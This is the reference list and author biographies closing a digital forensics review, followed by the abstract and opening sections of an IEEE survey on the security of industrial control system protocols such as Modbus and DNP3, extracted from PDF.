[212] O. Sallavaci and C. George, ``Procedural aspects of the new regime for the admissibility of expert evidence: What the digital forensic expert needs to know,'' Int. J. Electron. Secur. Digit. Forensics, vol. 5, nos. 34, pp. 161171, 2013. [213] P. Sommer, ``Certi cation, registration and assessment of digital forensic experts: The U.K. experience,'' Digit. Invest., vol. 8, no. 2, pp. 98105, Nov. 2011. [214] D. Garrie. (2016). The Neutral Corner: Understanding a Digital Foren- sics Report . [Online]. Available: https://www.legalexecutiveinstitute. com/understanding-digital-forensics% -report/ [215] H. Bariki, M. Hashmi, and I. Baggili, ``De ning a standard for report- ing digital evidence items in computer forensic tools,'' in Proc. Int. Conf. Digit. Forensics Cyber Crime. Berlin, Germany: Springer, 2010, pp. 7895. [216] N. M. Karie, V. R. Kebande, H. S. Venter, and K.-K.-R. Choo, ``On the importance of standardising the process of generating digital forensic reports,'' Forensic Sci. Int., Rep., vol. 1, Nov. 2019, Art. no. 100008. [217] D. Klitou, ``Privacy by design and privacy-invading technologies: Safe- guarding privacy, liberty and security in the 21st century,'' Legisprudence, vol. 5, no. 3, pp. 297329, 2011. [218] N. Daniels, ``Justice, health, and healthcare,'' Amer. J. Bioethics, vol. 1, no. 2, pp. 216, Feb. 2001. [219] M. Neocleous, ``Security, liberty and the myth of balance: Towards a critique of security politics,'' Contemp. Political Theory, vol. 6, no. 2, pp. 131149, May 2007. [220] (2004). Council of Europe. Details of treaty no. 185 . [Online]. Available: https://www.coe.int/en/web/conventions/full-list/- /conventions/treaty/1% 85 [221] (1962). C. of Europe. Details of Treaty no. 030. [Online]. Available: https://www.coe.int/en/web/conventions/full-list/- /conventions/treaty/0% 30 [222] (2013). C. of Europe. Data Protection and Cybercrime Division, Electronic Evidence Guide. [Online]. Available: https://rm.coe.int/16803028af [223] (2018). C. of Europe. Towards a Protocol to the Budapest Con- vention. [Online]. Available: https://rm.coe.int/t-cy-pd-pubsummary- v6/1680795713 [224] (2016). E. Union. Directive (EU) 2016/680 of the European Parliament and of the Council. [Online]. Available: https://eur-lex.europa.eu/legal- content/EN/TXT/?uri=CELEX%3A32016L0680 [225] E. Union. (2014). Regulation (EU) no 910/2014, of the European Parliament and of the Council. [Online]. Available: https://eur- lex.europa.eu/legal-content/EN/TXT/?uri=uriserv%3AOJ.L_.201% 4.257.01.0073.01.ENG[226] (2019). European Commission. E-evidenceCross-Border Access to Electronic Evidence. [Online]. Available: https://ec.europa.eu/info/ policies/justice-and-fundamental-rights/crimi%nal-justice/e-evidence- cross-border-access-electronic-evidence_en [227] (2016). European Union. Regulation (EU) 2016/95 of the Euro- pean Parliament and of the Council. [Online]. Available: https://eur- lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32016R0095 [228] (2017). E. Union. Final Report SummaryEuropean Informatics Data Exchange Framework for Courts and Evidence. [Online]. Available: https://cordis.europa.eu/project/id/608185/reporting [229] F. Insa, ``The admissibility of electronic evidence in court (A.E.E.C.): Fighting against high-tech crimeResults of a European study,'' J. Digit. Forensic Pract., vol. 1, no. 4, pp. 285289, Jun. 2007. [230] M. A. Biasiotti, J. P. M. Bonnici, J. Cannataci, and F. Turchi, Handling and Exchanging Electronic Evidence Across Europe. vol. 39. Cham, Switzerland: Springer, 2018. [231] Electronic EvidenceA basic Guide for First Responders, Eur. Netw. Inf. Secur. Agency (ENISA), Athens, Greece, 2015. [232] R. Marty, ``Cloud application logging for forensics,'' in Proc. ACM Symp. Appl. Comput. (SAC), 2011, pp. 178184. [233] P. Trenwith and H. Venter, ``Digital forensic readiness in the cloud,'' in Proc. IEEE Information Security for South Africa, 2013, pp. 15. [234] A. Patrascu and V.-V. Patriciu, ``Logging system for cloud computing forensic environments,'' J. Control Eng. Appl. Informat., vol. 16, no. 1, pp. 8088, 2014. [235] V. Kebande and H. Venter, ``A functional architecture for cloud forensic readiness large-scale potential digital evidence analysis,'' in Proc. Eur. Conf. Cyber Warfare Secur., 2015, p. 373. [236] S. Zawoad, A. K. Dutta, and R. Hasan, ``Towards building foren- sics enabled cloud through secure logging-as-a-service,'' IEEE Trans. Depend. Sec. Comput., vol. 13, no. 2, pp. 148162, Mar./Apr. 2016. [237] M. A. M. Ahsan, A. W. B. A. Wahab, M. Y. I. B. Idris, S. Khan, E. Bachura, and K.-K.-R. Choo, ``CLASS: Cloud log assuring soundness and secrecy scheme for cloud forensics,'' IEEE Trans. Sustain. Comput., vol. 6, no. 2, pp. 184196, Apr. 2021. [238] H. Tian, J. Wang, C.-C. Chang, and H. Quan, ``Public auditing of log integrity for shared cloud storage systems via blockchain,'' Wireless Netw., vol. 2020, pp. 378387, May 2020. [239] F. Casino, E. Politou, E. Alepis, and C. Patsakis, ``Immutability and decentralized storage: An analysis of emerging threats,'' IEEE Access, vol. 8, pp. 47374744, 2020. [240] V. R. Kebande, R. A. Ikuesan, and N. M. Karie, ``Review of blockchain forensics challenges,'' in Blockchain Security in Cloud Computing. Cham, Switzerland: Springer, 2022, pp. 3350. [241] S. T. Ali, P. McCorry, P. H.-J. Lee, and F. Hao, ``ZombieCoin 2.0: Man- aging next-generation botnets using bitcoin,'' Int. J. Inf. Secur., vol. 17, no. 4, pp. 411422, Aug. 2018. [242] C. Patsakis and F. Casino, ``Hydras and IPFS: A decentralised play- ground for malware,'' Int. J. Inf. Secur., vol. 18, no. 6, pp. 787799, Dec. 2019. [243] (2020). O. Caspi. Trickbot Bazarloader in-Depth [Online]. Available: https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-% in-depth [244] F. Casino, N. Lykousas, V. Katos, and C. Patsakis, ``Unearthing malicious campaigns and actors from the blockchain DNS ecosystem,'' Comput. Commun., vol. 179, pp. 217230, Nov. 2021. [245] T. de Balthasar and J. Hernandez-Castro, ``An analysis of bitcoin laun- dry services,'' in Secure IT Systems (Lecture Notes in Computer Sci- ence), H. Lipmaa, A. Mitrokotsa, and R. Matulevicius, Eds., vol. 10674. Springer, 2017, pp. 297312, doi: 10.1007/978-3-319-70290-2_18. [246] G. Kumar, R. Saha, C. Lal, and M. Conti, ``Internet-of-forensic (IoF): A blockchain based digital forensics framework for iot applications,'' Future Gener. Comput. Syst., vol. 120, pp. 1325, 2021. [247] (2019). LOCARD: Lawful Evidence Collecting and Continuity Platform Development. [Online]. Available: https://locard.eu [248] L. Zarpala and F. Casino, ``A blockchain-based forensic model for nan- cial crime investigation: The embezzlement scenario,'' Digit. Finance, vol. 3, no. 3, pp. 132, 2021. [249] T. Li, A. K. Sahu, A. Talwalkar, and V. Smith, ``Federated learning: Challenges, methods, and future directions,'' IEEE Signal Process. Mag. , vol. 37, no. 3, pp. 5060, May 2020. [250] Q. Yang, Y. Liu, T. Chen, and Y. Tong, ``Federated machine learning: Concept and applications,'' ACM Trans. Intell. Syst. Technol., vol. 10, no. 2, pp. 119, 2019. VOLUME 10, 2022 25491 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [251] L. Ogiela and M. R. Ogiela, ``Cognitive security paradigm for cloud computing applications,'' Concurrency Comput., Pract. Exper., vol. 32, no. 8, p. e5316, Apr. 2020. [252] K. Demertzis, P. Kikiras, N. Tziritas, S. Sanchez, and L. Iliadis, ``The next generation cognitive security operations center: Network ow forensics using cybersecurity intelligence,'' Big Data Cognit. Comput., vol. 2, no. 4, p. 35, Nov. 2018. [253] S. Schuster, M. van den Berg, X. Larrucea, T. Slewe, and P. Ide-Kostic, ``Mass surveillance and technological policy options: Improving security of private communications,'' Comput. Standards Interfaces, vol. 50, pp. 7682, Feb. 2017. [254] D. J. Bernstein, T. Lange, and R. Niederhagen, ``Dual EC: A standardized back door,'' in The New Codebreakers. Berlin, Germany: Springer, 2016, pp. 256281. [255] M. Smith and M. Green, ``A discussion of surveillance backdoors: Effec- tiveness, collateral damage and ethics,'' in Proc. Int. Secur. 21st Century, Germany's Int. Responsibility, 2016, pp. 131142. [256] E. Rice, ``The second amendment and the struggle over cryptography,'' Hastings Sci. Tech. LJ, vol. 9, p. 29, Oct. 2017. [257] A. M. Dunn, O. S. Hofmann, B. Waters, and E. Witchel, ``Cloaking malware with the trusted platform module,'' inProc. 20th USENIX Secur. Symp. (USENIX Security), San Francisco, CA, USA, Aug. 2011, pp. 116. [Online]. Available: https://www.usenix.org/conference/usenix-security-11/cloaking- malware-t% rusted-platform-module [258] A. Adadi and M. Berrada, ``Peeking inside the black-box: A sur- vey on explainable arti cial intelligence (XAI),'' IEEE access, vol. 6, pp. 5213852160, 2018. [259] (2020). The European Union Agency for Cybersecurity (ENISA). Guideline on Security Measures Under the EECC. [Online]. Available: https://www.enisa.europa.eu/publications/guideline-on-security- measures% -under-the-eecc/ [260] (2020). The European Union Agency for Cybersecurity (ENISA). 5G supplementTo the Guideline on Security Measures Under the EECC. [Online]. Available: https://www.enisa.europa.eu/publications/5g- supplement-security-measure% s-under-eecc/ [261] (2020). N. I. of Standards and Technology. SP 800-124 rev. 2Guidelines for Managing the Security of Mobile Devices in the Enterprise. [Online]. Available: https://csrc.nist.gov/publications/detail/sp/800-124/rev- 2/draft [262] (2020). National Institute of Standards and Technology. NIST Releases Draft Guidance on Internet of Things Device Cybersecurity . [Online]. Available: https://www.nist.gov/news-events/news/2020/12/nist- releases-draft-guida% nce-internet-things-device-cybersecurity [263] The European Union Agency for Cybersecurity (ENISA). Guidelines for securing the Internet of Things. (2020). [Online]. Available: https://www.enisa.europa.eu/publications/guidelines-for-securing-the- in% ternet-of-things [264] (2017). The European Union Agency for Cybersecurity (ENISA). Guide- lines for SMES on the Security of Personal Data Processing. [Online]. Available: https://www.enisa.europa.eu/publications/guidelines-for- smes-on-the-sec% urity-of-personal-data-processing [265] (2020). National Institute of Standards and Technology. NIST Privacy Framework: A Tool for Improving Privacy Through Enterprise Risk Management. [Online]. Available: https://www.nist.gov/system/ les/ documents/2020/01/16/NIST%20Privacy%% 20Framework_V1.0.pdf [266] (2019). National Institute of Standards and Technology. Recommen- dations on Shaping technology According to GDPR Provisions Exploring the Notion of Data Protection by Default . [Online]. Available: https://www.enisa.europa.eu/publications/recommendations- on-shaping-tec% hnology-according-to-gdpr-provisions-part-2 [267] A. Zigomitros, F. Casino, A. Solanas, and C. Patsakis, ``A survey on privacy properties for data publishing of relational data,'' IEEE Access, vol. 8, pp. 5107151099, 2020. [268] (2019). The European Union Agency for Cybersecurity (ENISA). Towards a Framework for Policy Development in Cybersecurity Security and Privacy Considerations in Autonomous Agents. [Online]. Available: https://www.enisa.europa.eu/publications/considerations-in- autonomous-a% gents [269] H. Arshad, E. Omlara, I. O. Abiodun, and A. Aminu, ``A semi-automated forensic investigation model for online social networks,'' Comput. Secur., vol. 97, Oct. 2020, Art. no. 101946. [270] N. Sunde and G. Horsman, ``Part 2: The phase-oriented advice and review structure (PARS) for digital forensic investigations,'' Forensic Sci. International: Digit. Invest. , vol. 36, Mar. 2021, Art. no. 301074. FRAN CASINO (Member, IEEE) received the B.Sc. degree in computer science, the M.Sc. degree in computer security and intelligent sys- tems, and the Ph.D. degree (cum laude) in com- puter science from Rovira i Virgili University, Tarragona, Catalonia, Spain, in 2010, 2013, and 2017, respectively. He was a Visiting Researcher at ISCTE-IUL, Lisbon, in 2016. He has partici- pated in several European-, Spanish-, and Catalan- funded research projects, and he has authored more than 50 publications in peer-reviewed international conferences and journals. He is a Postdoctoral Researcher with the Department of Computer Engineering and Mathematics, Rovira i Virgili University, and the Athena Research Center, Athens, Greece. His research interests include pattern recognition, and data management applied to different elds such as privacy and security protection, recommender systems, smart health, supply chain, and blockchain. He received the Best Dissertation Award from Rovira i Virgili University. THOMAS K. DASAKLIS received the bachelor's degree from the Department of Industrial Man- agement and Technology, University of Piraeus, and the M.Sc. degree in supply chain management and the Ph.D. degree in emergency supply chain management and disaster response from the Uni- versity of Piraeus. He has worked for the European Commission (DG Humanitarian Aid and Civil Protection) and the University of Piraeus Research Centre. He has also worked in the private sector for three years as the Supply Chain Director. He has participated in National and European research projects and has published papers in books, peer reviewed journals, and conference proceedings. He is currently an Assistant Professor with the School of Social Sciences, Hellenic Open University. His research interests include in the area of supply chain management, operational research, humanitarian logistics/disaster response, data analysis, and blockchain technology. He has served as a guest editor, a Program Committee Member, and a reviewer for various international journals and conferences. GEORGIOS P. SPATHOULAS received the Diploma of Electrical and Computer Engineering degree from the Aristotle University of Thessa- loniki, in 2002, the M.Sc. degree in computer sci- ence from The University of Edinburgh, in 2005, and the Ph.D. degree from the Department of Dig- ital Systems, University of Piraeus, in 2013. He is a member of Laboratory Teaching Staff of the Department of Computer Science and Biomedical Informatics, University of Thessaly, since 2014, and he teaches in both undergraduate and postgraduate study programs of the department. He is also a Postdoctoral Researcher with the Critical Infrastruc- tures Security and Resilience Group at the Center for Cyber and Information Security (CCIS), Norwegian University of Science and Technology (NTNU). He is the coauthor of more than 30 publications in peer reviewed journals and conference proceedings. His research interests include related to networks security, privacy preserving techniques, and blockchain technology. He has also served as the Program Committee Member for international conferences and has taken part in both national and international research programs. 25492 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews MARIOS ANAGNOSTOPOULOS received the master's degree in information and communica- tion systems security and the Ph.D. degree in infor- mation and communication systems engineering from the University of the Aegean, Greece. He has worked as a Postdoctoral Research Fellow in cyber security at the Norwegian University of Science and Technology (NTNU) and the Singapore Uni- versity of Technology and Design (SUTD). He has joined the Department of Electronic Systems, Aalborg University, Copenhagen, as an Assistant Professor at the Commu- nication, Media and Information Technologies Section, Aalborg University, and is a member of the Cyber-Security Research Group. He is the coauthor of more than 20 publications in peer-reviewed international conferences and journals. His research interests include the area of networks and computer security, and speci cally DNS security, denial of service attacks, malware analysis, and forensics. He has also served as a Program Committee Member for international conferences and has taken part in both national and interna- tional research programs. AMRITA GHOSAL received the Ph.D. degree in computer science and engineering from the Indian Institute of Engineering Science and Technology, India, in 2015. After her Ph.D. degree, she worked as a Postdoctoral Researcher at the Department of Mathematics, University of Padua, Italy. She is currently a Marie Sk odowska-Curie Fellow with the Department of Electronic and Computer Engineering, University of Limerick, Ireland. She has coauthored a number of book chapters. Her research interests include in the areas of security and privacy for mobile and wireless networks. Particularly, she is interested in detection, prevention, and mitigation of different DoS style attacks for smart grid, v2x, connected vehicle, cyber-physical systems, and the IoT. In these areas, she has pub- lished more than 35 papers in high quality journals and refereed conference proceedings. ISTV N BO ROCZreceived the Law (JD) and postgraduate specialist Diploma degrees in infor- mation and communication technology law from the University of P cs, in 2013 and 2015, respec- tively, and the LLM degree in law and technol- ogy from Tilburg University, in 2016. He is a Data Protection Of cer at Ion Beam Applications SA (IBA) and a Researcher at the Research Group on Law, Science, Technology and Society (LSTS). He is also a member of the Health and Ageing Law Laboratory (HALL), a spinoff group within LSTS. He is involved and provides legal assistance in several EU co-funded research projects, such as ARC, LOCARD, PERSONA, STAR, INTREPID, MaTHiSiS, FORENSOR, HR-Recycler, and SUCCESS or PARENT. These projects target a range of areas, such as law enforcement, technology-induced education, humanrobot interaction, smart cities, or helping the work of data protection authorities. He is a member of the Ethical Advisory Board of the Horizon2020 Project CUIDAR. His research interests include the notion of the privacy of the mind along with the legal, theoretical, and practical issues of human enhancement technologies, with special focus on cognitive enhancement. In particular, he focuses on technologies which passively read and actively affect the human brain and the mind both within and outside the eld of health care. He is also an Editor of the World Law Dictionary, developed by TransLegal Sweden AB. AGUSTI SOLANAS (Senior Member, IEEE) received the M.Sc. degree (Hons.) in com- puter engineering from Rovira i Virgili Univer- sity (URV), in 2004, the Diploma degree in advanced studies from the Polytechnic Univer- sity of Catalonia, in 2005, and the Ph.D. degree from the Department of Telematics Engineering, Polytechnic University of Catalonia, in 2007. He is currently a Professor with the Department of Com- puter Engineering and Mathematics and the Head of the Smart Technologies Research Group, URV. He serves as a Scienti c Coordinator for APWG.EU. His current research interests include smart technologies, health informatics, behavior analysis, multivariate analysis, privacy protection, and computer security. MAURO CONTI (Fellow, IEEE) received the Ph.D. degree from the Sapienza University of Rome, Italy, in 2009. After his Ph.D. degree, he was a Postdoctoral Researcher at Vrije Uni- versiteit Amsterdam, The Netherlands. In 2011, he joined as an Assistant Professor at the Univer- sity of Padua, Italy, where he became an Associate Professor, in 2015, and a Full Professor, in 2018. He has been a Visiting Researcher with GMU, UCLA, UCI, TU Darmstadt, UF, and FIU. He is a Full Professor with the University of Padua. He is also af liated with the Delft University of Technology (TU Delft) and the University of Washington, Seattle. His research is funded by companies, including Cisco, Intel, and Huawei. His main research interests include security and privacy. In these areas, he has published more than 400 papers in topmost international peer- reviewed journals and conferences. He is a Senior Member of the ACM and a fellow of the Young Academy of Europe. He has been awarded with a Marie Curie Fellowship by the European Commission, in 2012, and with a Fellowship by the German DAAD, in 2013. He was the Program Chair of TRUST 2015, ICISS 2016, WiSec 2017, ACNS 2020, and CANS 2021, and the General Chair for SecureComm 2012, SACMAT 2013, NSS 2021, and ACNS 2022. He is the Editor-in-Chief of IEEE TRANSACTIONS ON INFORMATION FORENSICS AND SECURITY, the Area Editor-in-Chief of IEEE COMMUNICATIONS SURVEYS AND TUTORIALS, and he has been an Associate Editor of several journals, including IEEE COMMUNICATIONS SURVEYS AND TUTORIALS, IEEE TRANSACTIONS ON DEPENDABLE AND SECURE COMPUTING, IEEE TRANSACTIONS ON INFORMATION FORENSICS AND SECURITY, and IEEE T RANSACTIONS ON NETWORK ANDSERVICE MANAGEMENT. CONSTANTINOS PATSAKIS received the B.Sc. degree in mathematics from the University of Athens, Greece, the M.Sc. degree in information security from the Royal Holloway, University of London, and the Ph.D. degree in cryptography and malware from the Department of Informatics, University of Piraeus. He has participated in sev- eral national (Greek, Spanish, Catalan, and Irish) and European research and development projects (e.g., TACTICS, MITIGATE, OPERANDO, SAURON, PRACTICIES, and YAKSHA). He worked as a Researcher at the UNESCO Chair in data privacy and as a Research Fellow at the Trinity College Dublin, Dublin, Ireland. His main research interests include cryptography, malware, security, privacy, and data anonymization. Currently, he is Assistant Professor at University of Piraeus and adjunct researcher of Athena Research and Innovation Center. VOLUME 10, 2022 25493
Security_Challenges_in_Control_Network_Protocols_A_Survey.pdf
With the ongoing adoption of remotely communicating and interacting control systems harboredby critical infrastructures, the potential attack surface of suchsystems also increases drastically. Therefore, not only the needfor standardized and manufacturer-agnostic control systemcommunication protocols has grown, but also the requirementto protect those control systems communication. There havealready been numerous security analyses of different controlsystem communication protocols; yet, these have not beencombined with each other suf ciently, mainly due to threereasons: First, the life cycles of such protocols are usuallymuch longer than those of other Internet and communication technologies, therefore legacy protocols are often not considered in current security analyses. Second, the usage of certaincontrol system communication protocols is usually restricted toa particular infrastructure domain, which leads to an isolatedview on them. Third, with the accelerating pace at which bothcontrol system communication protocols and threats againstthem develop, existing surveys are aging at an increased rate,making their re-investigation a necessity. In this paper, acomprehensive survey on the security of the most importantcontrol system communication protocols, namely Modbus, OPCUA, TASE.2, DNP3, IEC 60870-5-101, IEC 60870-5-104, andIEC 61850 is performed. To achieve comparability, a commontest methodology based on attacks exploiting well-known controlsystem protocol vulnerabilities is created for all protocols. Inaddition, the effectiveness of the related security standard IEC62351 is analyzed by a pre- and post-IEC 62351 comparison.
IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 619 Security Challenges in Control Network Protocols: A Survey Anna V olkova , Michael Niedermeier , Robert Basmadjian , and Hermann de Meer Index Terms Control systems, network protocols, network security. I. I NTRODUCTION :CONTROL NETWORKS IN THE CHANGE OF TIME THE NEED to take fast and cost effective decisions in a global market pressures service providers to enhance their infrastructures using remotely accessible control networks.A prime example of such networked control systems areSupervisory Control and Data Acquisition (SCADA) systems, used to operate and monitor a wide portion of industrial facilities and processes, often distributed over large geo-graphic areas. To be able to signal and control such systems, the previous isolation of SCADA systems has been more Manuscript received October 10, 2017; revised April 11, 2018 and July 20, 2018; accepted September 1, 2018. Date of publication September26, 2018; date of current version February 22, 2019. (Corresponding author: Michael Niedermeier.) The authors are with the Computer Networking Laboratory, Department of Computer Science and Mathematics, University ofPassau, 94032 Passau, Germany (e-mail: [email protected]; [email protected]; [email protected]; [email protected]). Digital Object Identi er 10.1109/COMST.2018.2872114and more reduced. Company networks and later on even remote access were allowed to control SCADA systems using telecontrol technologies. Due to the fast development of Information and Communications Technology (ICT), and par-ticularly networking technology, the adoption of the Internetand a need to remotely control systems from anywhere around the world, consequently the complete isolation (i.e., an air- gap ) between control and potentially publicly accessiblenetworks became illusionary [ 1]. Standard computer systems and their security measures adapted and grew to match the new requirements of this interconnected world. In contrast, most control systems weredeveloped in the 1970s and designed to match the lifetime of the devices they were controlling, which would easily have a lifecycle of some 30 years. As most techniques in controlsystems including hardware, software and networking weretherefore designed long before network security was perceived to be a requirement, challenges rapidly began to develop. Unfortunately, it took a long time for researchers and indus-trial stakeholders until worldwide attacks on control systems (e.g., [ 2] [4]) became more prevailing to realize the impor- tance of network security. Two examples of such controlsystem security incidents are described below: Attack on Maroochy Water Services, Australia: In 2000, a former employee of the Maroochy Water Services in Australia gained access to the water pumping SCADAsystem and released tons of sewage water into parks, rivers and residences. The damage to the company and the environment was enormous. The employee, who helpedinstall the SCADA system in this area, exploited the lackof security policies and defense mechanisms to launch a series of attacks against different pumping systems of the company. He disguised his actions as normal malfunc-tions that needed to be physically repaired. The culprit was only arrested by chance, when he was stopped by a police patrol [ 2]. Attack on public tram system in Lodz, Poland: In 2008, a teenager was able to hack the SCADA system controlling the public tram system in Lodz, Poland. He gained full access to the system, which had no security measuresimplemented and controlled the trains with a self-built remote control, which was able to send signals to the Remote Terminal Units (RTUs) controlling the junctions.Several trains were derailed and passengers were hurtduring this attack [ 4]. The persistent challenge control system networks have been facing is that they inherit security weaknesses fromoutside networks, putting industrial production, environmental 1553-877X c/circlecopyrt2018 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. 620 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 21, NO. 1, FIRST QUARTER 2019 integrity and human safety at risk [ 5]. One of the fore- most weaknesses exploited in industrial control networks arevulnerabilities in the communication protocol standards andimplementations [ 6] [8]. However, up till now, no comprehen- sive analysis regarding the vulnerabilities and attacks of the most well-known control system protocols has been realized. A. Research Objective Looking at control system communication protocols (CSCPs), one can notice that there have been a broad andlong lasting series of such protocols which were often devel-oped a long time ago. To this regard, there have been several survey works in literature (see Section II) that tackled spe- ci c protocols from different perspectives. What is currentlylacking is a single methodology that describes those protocols by looking at the problems from multiple dimensions. In this paper, we propose such a methodology as our research objec-tive which allows us, based on a uni ed adversary model, toqualitatively describe and structurally classify communication protocols for control systems based on their threat levels. Our work provides the following contributions: 1) We propose a uni ed methodology to analyze the secu- rity of the most relevant CSCPs from the IEC 62351 standard s perspective. 2) We carry out a security assessment of CSCPs by con- sidering pre- and post-implementation of the IEC 62351 standard. 3) We compose a ne-granular adversary model and attack scenarios that are essential in the context of Industrial Control Systems (ICSs). 4) We provide general protection measures as well as several security recommendations to improve the IEC62351 standard and CSCPs. 5) We review well-known enhanced versions of legacy CSCPs and analyze them in the context of real lifescenarios. B. Structure The remainder of this paper is structured as follows: Section IIillustrates related work. Section IIIelaborates on the seven most important as well as ve enhanced legacy CSCPs and describes general requirements and challenges of control network protocols. In Section IV, the adversary model con- sidered in this paper is addressed. The security methodology and the protocol analysis are covered in Section V. The paper is concluded in Section VI, and future research directions are pointed out in Section VII. II. R ELATED WORK The research area around control system protocols and their security challenges have been investigated for several decadesalready. The previous related work can be classi ed into three different types of contributions: Generic surveys, which covered general attack possibili- ties on a high abstraction level (Section II-A), Control system security analysis covering a single or a few protocols at most (Section II-B), or Security research which focuses only very speci c types of attacks (Section II-C). In the following, prominent examples of all three types of contributions are discussed. A. Overview-Type Related Work Dzung et al. [9] provide a survey including security goals in control networks, possible attack vectors, and security solu- tions to mitigate them. The survey gives a detailed overview of the current goals and challenges in control networks aswell as partially in CSCPs, however, no further analysis of the protocols regarding their vulnerabilities is provided. Mohagheghi et al. show a detailed survey regarding both legacy CSCPs and their challenges as well as future trendsin control systems in [ 10]. The paper mainly compares legacy protocols to the newer IEC 61850 standard, but does not put a major focus on security challenges. Johnson explores theweaknesses of SCADA-based systems in [ 11]. Also, several methods and tools are proposed to augment SCADA security. An overview of SCADA systems components and the proto-cols Distributed Network Protocol (DNP3), IEC 60870-5, aswell as IEC 60870-5-101 is given by Alsiherov and Kim [ 12]. Furthermore, the security standard 62351 is brie y introduced and security measures on the transport and network layer arediscussed; security features of CSCPs are however not part of the paper. An overview of incidents related to missing SCADA security with a clear classi cation of attacks andthe impact of incidents are given in [ 2] by Miller and Rowe. Robinson presents an adversary model as well as an overview on threat actors for SCADA systems in general and discusses security breaches in CSCPs [ 13]. The paper delivers security recommendations for ICSs in general. The risks to SCADAand ICS as well as the methods used by attackers to exploit vulnerabilities in those systems are investigated in [ 14]b y Bartman and Carson. The paper additionally covers mitiga-tion strategies for the discussed threats. While the analysis is covering many attack vectors and threats, it does not focus on CSCPs speci cally; in contrast, the focus is set to mitigationstrategies ranging from (physical) tamper detection to networksecurity. Instead of giving an abstract overview of overarching prob- lems in ICSs, SCADA, and/or CSCPs in general, our surveycovers detailed attack scenarios for the most relevant CSCPs and gives concrete information regarding the expected impact of attacks. Also, mitigation strategies are provided. B. Protocol-Speci c Related Work Michalski et al. perform an in-depth analysis of the Telecontrol Application Service Element 2 (TASE.2) protocolin [15]. This covers both a detailed analysis of TASE.2 and its intended goals and functions, as well as possible security challenges and mitigation strategies. Schwarz and Bo rcs k investigate the security of Open Platform Communications(OPC) Uni ed Architecture (UA) both on the application and communication layers in [ 16], which includes a ne- granular description of the protocol itself as well as its currentchallenges. Kroto l and Gollmann [ 17] provide a survey of selected state-of-the-art control system security methods. While there are several security-related research papers cited, Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 621 TABLE I CLASSIFICATION OF RELATED WORK (PART 1) the work mainly revolves around the Modbus protocol and DNP3. Drias et al. [18] analyze control systems and their security requirements in general without applying a speci cfocus. Regarding the CSCPs, again Modbus and DNP3 are brie y investigated. A testbed-based approach to study and simulate the various available techniques for securing and pro-tecting SCADA systems against a wide range of cyber attacksis discussed in [ 19]. The developed testbed is then used to analyze Denial of Service (DoS) and compromised Human Machine Interface (HMI) attacks on the Modbus and DNP3protocols. While the testbed-based approach in [ 19]o f f e r s a realistic scenario for the security assessment of SCADA systems, both the discussion of the adversary model as wellas the analysis of security aws within CSCPs are very brief.East et al. [20] present a taxonomy of attacks on DNP3. The attacks are classi ed based on targets (control center, out- station devices and network/communication paths) and threatcategories (interception, interruption, modi cation and fabri- cation). The attack taxonomy clari es the nature and scope of threats to DNP3. Lee et al. [21] analyze DNP3 and its existing security enhanced variants DNPSec and DNP3Secure Authentication (SA). In addition, a new secure ver- sion of DNP3 named DNP3 Authenticated Encryption is developed and compared to DNP3, DNPSec, and DNP3 SA.Pidikiti et al. discuss a wide range of vulnerabilities and sub- sequent attacks on the IEC 60870-5-101 and IEC 60870-5-104 protocols in [ 22]. Matou sek provides an overview of IEC 60870-5-104 in [ 23] with a detailed description of the pro- tocol s Application Protocol Control Information (APCI) and Application Service Data Unit (ASDU) formats. Additionally, the security challenges currently present in IEC 60870-5-104are analyzed. An analysis on vulnerabilities in the Modbus andInternational Electrotechnical Commission (IEC) 61850 pro- tocols is the topic of [ 24]. For both protocols, two different types of attacks are assessed: awed/missing cryptographicprotection and memory corruption vulnerabilities. In [ 25], an evaluation method for SCADA cyber security based on testbeds is presented. The proposed test environment re ectsthe real control and supervision substation of an electricitygeneration and distribution control system. Special focus is placed on the analysis of the overall behavior of both the IEC 60870-5-104 and IEC 61850 protocols. Similar to [ 19], the paper offers a testbed-focused approach, which however restricts its scenarios regarding both the type of attackers and the investigated protocols. If not stated otherwise, the difference between our survey and the aforementioned work is that they only cover one or twoCSCPs, while our survey investigates the seven most widely used CSCPs as well as three enhanced versions of Modbus and two of DNP3 and compares them using a uni ed methodol-ogy. Therefore, this difference is not explicitly stated for each related work. C. Attack-Speci c Related Work Maynard et al. present Man-in-the-Middle (MitM) attacks on the IEC 60870-5-104 protocol in [ 26]. Address Resolution Protocol (ARP) spoo ng-based MitM attacks on the Modbusand DNP3 protocols are investigated by Yang et al. [27]i n a cyber-security testbed which contains SCADA software and communication infrastructures. Apart from that, future plans on implementing intrusion detection and prevention technol-ogy to address cyber-security issues in SCADA systems are presented. Both papers offer a deep investigation of a sin- gle attack, however, their contribution is limited due to thespecialized focus. In comparison, our survey covers multiple attacks that threaten all three main security goals (con dentiality, integrity, availability). Tables IandIIoffer an overview of the currently existing work and the research areas covered. It is noted herethat not all entries in Tables IandIIare explicitly addressed in this section due to space restrictions. To give a more com- prehensive overview however, further related work is includedin Tables IandII . III. C ONTROL NETWORK PROTOCOLS :OVERVIEW , REQUIREMENTS AND CHALLENGES In this section, we rst give an overview of the most relevant CSCPs, and then present their requirements in terms of secu- rity and performance. This section is concluded by illustratingthe implementation challenges of CSCPs in ICSs. A. Overview The CSCPs analyzed in this survey are selected based on two requisites. First, the chosen protocols need to beof major importance within the sector of industrial control systems. Second, only standard protocols (and their security- enhanced variants) are considered in this survey, proprietarysolutions are omitted. The chosen protocols (Modbus, OPC UA, TASE.2, DNP3, IEC 60870-5-101, IEC 60870-5-104, and IEC 61850) all ful ll these prerequisites [ 45] [47]. Fig. 1 depicts an overview of the aforementioned seven protocolsand the enhanced variants of Modbus and DNP3 (marked in green) as well 